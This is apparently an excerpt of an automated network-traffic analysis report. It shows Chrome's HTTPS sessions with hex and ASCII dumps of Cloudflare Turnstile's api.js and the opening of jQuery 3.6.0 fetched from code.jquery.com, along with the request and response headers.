                                                                          2025-03-04 17:25:11 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 7a 74 28 65 29 7c 7c 42 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                          Data Ascii: ray$/.test(a))return ot(e,t)}}function Ie(e,t){return zt(e)||Bt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Pe(e,t){var a={label:0,sent:function(){if(l[0
                                                                          2025-03-04 17:25:11 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var We=300030;var Ue=300031;var q;(fu
                                                                          2025-03-04 17:25:11 UTC1369INData Raw: 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 65 65 7c 7c 28 65 65 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 65 76 65 72 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 61 6e 75 61 6c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 6c 77 61 79 73 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 78 65 63 75 74 65 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 6e 74 65 72 61 63 74 69 6f 6e 4f 6e 6c 79 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 65 6e 64 65 72
                                                                          Data Ascii: manual",e.Auto="auto"})(ee||(ee={}));var ce;(function(e){e.Never="never",e.Manual="manual",e.Auto="auto"})(ce||(ce={}));var Q;(function(e){e.Always="always",e.Execute="execute",e.InteractionOnly="interaction-only"})(Q||(Q={}));var me;(function(e){e.Render
                                                                          2025-03-04 17:25:11 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 4d 2e 4e 6f 72 6d 61 6c 2c 4d 2e 43 6f 6d 70 61 63 74 2c 4d 2e 49 6e 76 69 73 69 62 6c 65 2c 4d 2e 46 6c 65 78 69 62 6c 65 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 4e 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74
                                                                          Data Ascii: unction pt(e){return L([M.Normal,M.Compact,M.Invisible,M.Flexible],e)}function vt(e){return L(["auto","manual","never"],e)}function mt(e){return L(["auto","manual","never"],e)}var Nr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){return e==="auto"||Nr.test
                                                                          2025-03-04 17:25:11 UTC1369INData Raw: 72 22 2c 22 72 6f 2d 72 6f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 74 29 7b 76 61 72 20 61 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 74 29 7b 76 61 72 20 6f 3b 61 3d 28 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 41 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22
                                                                          Data Ascii: r","ro-ro"];function Tt(e,t){var a="https://challenges.cloudflare.com";if(t){var o;a=(o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,v,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",A=a["feedback-enabled"]===!1?"
                                                                          2025-03-04 17:25:11 UTC1369INData Raw: 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 74 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77
                                                                          Data Ascii: ect.setPrototypeOf||function(o,c){return o.__proto__=c,o},te(e,t)}function ur(e,t){if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,w
                                                                          2025-03-04 17:25:11 UTC1369INData Raw: 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 65 28 63 2c 6f 29 7d 2c 47 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 73 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 46 28 74 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 7a 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 42 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73
                                                                          Data Ascii: ,configurable:!0}}),te(c,o)},Ge(e)}function sr(e,t){return t&&(F(t)==="object"||typeof t=="function")?t:ze(e)}function dr(e){var t=Be();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this
                                                                          2025-03-04 17:25:11 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6f 3d 54 74 28 74 2e 70 61 72 61 6d 73 2c 21 31 29 2c 63 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 67 22 2c 22 2f 22 29 2c 6c 2c 76 2c 68 3d 22 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 76 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 76 21 3d 3d 76 6f 69 64 20 30 3f 76 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28
                                                                          Data Ascii: unction(e,t,a){var o=Tt(t.params,!1),c="h/".concat("g","/"),l,v,h="".concat(o,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((v=t.params.theme)!==null&&v!==void 0?v:t.theme,"/").concat(


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.649730151.101.2.1374437756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:25:11 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                          Host: code.jquery.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-03-04 17:25:11 UTC615INHTTP/1.1 200 OK
                                                                          Connection: close
                                                                          Content-Length: 89501
                                                                          Server: nginx
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                          ETag: "28feccc0-15d9d"
                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                          Access-Control-Allow-Origin: *
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                          Accept-Ranges: bytes
                                                                          Date: Tue, 04 Mar 2025 17:25:11 GMT
                                                                          Age: 4862197
                                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740031-EWR
                                                                          X-Cache: HIT, HIT
                                                                          X-Cache-Hits: 2774, 790
                                                                          X-Timer: S1741109112.755968,VS0,VE0
                                                                          Vary: Accept-Encoding
                                                                          2025-03-04 17:25:11 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                          2025-03-04 17:25:11 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                          2025-03-04 17:25:11 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                          2025-03-04 17:25:11 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                          2025-03-04 17:25:11 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                          2025-03-04 17:25:11 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                          2025-03-04 17:25:11 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                          2025-03-04 17:25:11 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                          2025-03-04 17:25:11 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                          2025-03-04 17:25:11 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.649731104.17.25.144437756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
